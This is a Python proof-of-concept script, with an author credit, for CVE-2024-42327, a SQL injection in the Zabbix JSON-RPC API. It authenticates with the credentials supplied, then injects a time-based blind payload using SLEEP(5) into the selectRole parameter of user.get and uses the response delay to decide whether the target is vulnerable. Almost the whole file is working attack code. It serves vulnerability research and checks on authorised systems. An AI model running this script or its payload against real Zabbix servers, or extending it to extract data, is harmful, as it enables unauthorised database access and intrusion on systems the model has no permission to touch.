cve-2024-42327.py

import requests
import argparse
import time

"""
Optimized Proof of Concept for CVE-2024-42327
Author: Patrick Schmid (compr00t.bsky.social)

References:
- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623

Disclaimer:
This script is provided for educational purposes only!
"""

HEADERS = {"Content-Type": "application/json"}

def get_auth_token(target, username, password):
    """Obtain a valid session token from the target."""
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    login_data = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"username": username, "password": password},
        "id": 1,
        "auth": None
    }

    try:
        response = requests.post(url, json=login_data, headers=HEADERS)
        response.raise_for_status()
        result = response.json().get("result")
        if result:
            print(f"[+] Session token: {result}")
            return result
        else:
            print("[-] Failed to retrieve session token. Check credentials.")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Login request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during login.")
    return None

def test_sqli(target, auth_token):
    """Test the target for SQL injection vulnerability."""
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    user_data = {
        "jsonrpc": "2.0",
        "method": "user.get",
        "params": {
            "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
            "userids": ["1", "2"]
        },
        "id": 1,
        "auth": auth_token
    }

    try:
        start_time = time.perf_counter()
        response = requests.post(url, json=user_data, headers=HEADERS)
        response.raise_for_status()
        elapsed_time = time.perf_counter() - start_time

        if elapsed_time < 5:
            print("[+] Response time < 5 seconds. Target is NOT vulnerable.")
        else:
            print(f"[!] Response time: {elapsed_time:.2f} seconds. Target is VULNERABLE!")
    except requests.exceptions.RequestException as e:
        print(f"[-] SQLi test request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during SQLi test.")

def main():
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2024-42327"
    )
    parser.add_argument("-t", "--target", required=True, help="The API endpoint URL.")
    parser.add_argument("-u", "--username", required=True, help="The username for authentication.")
    parser.add_argument("-p", "--password", required=True, help="The password for authentication.")

    args = parser.parse_args()

    auth_token = get_auth_token(args.target, args.username, args.password)
    if auth_token:
        test_sqli(args.target, auth_token)

if __name__ == "__main__":
    main()